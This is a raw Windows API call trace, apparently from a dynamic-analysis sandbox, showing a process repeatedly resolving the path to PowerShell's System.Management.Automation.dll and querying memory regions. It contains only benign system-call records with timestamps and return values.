	[0145.866] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.867] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.867] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.867] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.868] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.868] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.868] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.868] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbc40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.869] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbb90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.869] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbb90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.869] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.869] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.869] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.870] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.870] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.870] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.871] VirtualQuery (in: lpAddress=0x1cb0c0, lpBuffer=0x1cbf80, dwLength=0x30 | out: lpBuffer=0x1cbf80*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0145.873] VirtualQuery (in: lpAddress=0x1cb150, lpBuffer=0x1cc010, dwLength=0x30 | out: lpBuffer=0x1cc010*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0145.874] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.874] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.874] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.874] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.874] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.875] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.875] VirtualQuery (in: lpAddress=0x1cb8d0, lpBuffer=0x1cc790, dwLength=0x30 | out: lpBuffer=0x1cc790*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0145.946] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.946] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.946] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.946] VirtualQuery (in: lpAddress=0x1cb8d0, lpBuffer=0x1cc790, dwLength=0x30 | out: lpBuffer=0x1cc790*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0145.948] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.948] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.948] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.949] VirtualQuery (in: lpAddress=0x1cb8d0, lpBuffer=0x1cc790, dwLength=0x30 | out: lpBuffer=0x1cc790*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0145.949] VirtualQuery (in: lpAddress=0x1cb830, lpBuffer=0x1cc6f0, dwLength=0x30 | out: lpBuffer=0x1cc6f0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0145.949] VirtualQuery (in: lpAddress=0x1cb8c0, lpBuffer=0x1cc780, dwLength=0x30 | out: lpBuffer=0x1cc780*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0145.950] VirtualQuery (in: lpAddress=0x1cb830, lpBuffer=0x1cc6f0, dwLength=0x30 | out: lpBuffer=0x1cc6f0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0145.951] VirtualQuery (in: lpAddress=0x1cb8c0, lpBuffer=0x1cc780, dwLength=0x30 | out: lpBuffer=0x1cc780*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0145.951] VirtualQuery (in: lpAddress=0x1cb8c0, lpBuffer=0x1cc780, dwLength=0x30 | out: lpBuffer=0x1cc780*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0145.951] VirtualQuery (in: lpAddress=0x1cb830, lpBuffer=0x1cc6f0, dwLength=0x30 | out: lpBuffer=0x1cc6f0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0145.951] VirtualQuery (in: lpAddress=0x1cb8c0, lpBuffer=0x1cc780, dwLength=0x30 | out: lpBuffer=0x1cc780*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0145.952] VirtualQuery (in: lpAddress=0x1cb830, lpBuffer=0x1cc6f0, dwLength=0x30 | out: lpBuffer=0x1cc6f0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0145.952] VirtualQuery (in: lpAddress=0x1cb8c0, lpBuffer=0x1cc780, dwLength=0x30 | out: lpBuffer=0x1cc780*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0145.952] VirtualQuery (in: lpAddress=0x1cb830, lpBuffer=0x1cc6f0, dwLength=0x30 | out: lpBuffer=0x1cc6f0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0145.953] VirtualQuery (in: lpAddress=0x1cb8c0, lpBuffer=0x1cc780, dwLength=0x30 | out: lpBuffer=0x1cc780*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0145.953] VirtualQuery (in: lpAddress=0x1cb500, lpBuffer=0x1cc3c0, dwLength=0x30 | out: lpBuffer=0x1cc3c0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0145.956] VirtualQuery (in: lpAddress=0x1cb830, lpBuffer=0x1cc6f0, dwLength=0x30 | out: lpBuffer=0x1cc6f0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0145.957] VirtualQuery (in: lpAddress=0x1cb8c0, lpBuffer=0x1cc780, dwLength=0x30 | out: lpBuffer=0x1cc780*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0145.957] VirtualQuery (in: lpAddress=0x1cb830, lpBuffer=0x1cc6f0, dwLength=0x30 | out: lpBuffer=0x1cc6f0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0145.957] VirtualQuery (in: lpAddress=0x1cb8c0, lpBuffer=0x1cc780, dwLength=0x30 | out: lpBuffer=0x1cc780*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0145.957] CoCreateGuid (in: pguid=0x1cd0b0 | out: pguid=0x1cd0b0*(Data1=0x6bff6d86, Data2=0x63d5, Data3=0x4cef, Data4=([0]=0x88, [1]=0x1c, [2]=0xf4, [3]=0xb, [4]=0x5f, [5]=0x78, [6]=0xcb, [7]=0x82))) returned 0x0
	[0145.958] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.958] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.958] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.958] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.959] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.959] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.959] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.959] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.959] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.960] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbc40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.960] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbb90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.960] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbb90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.960] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.960] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.960] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.961] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.961] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.961] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.961] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.962] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.962] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.962] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
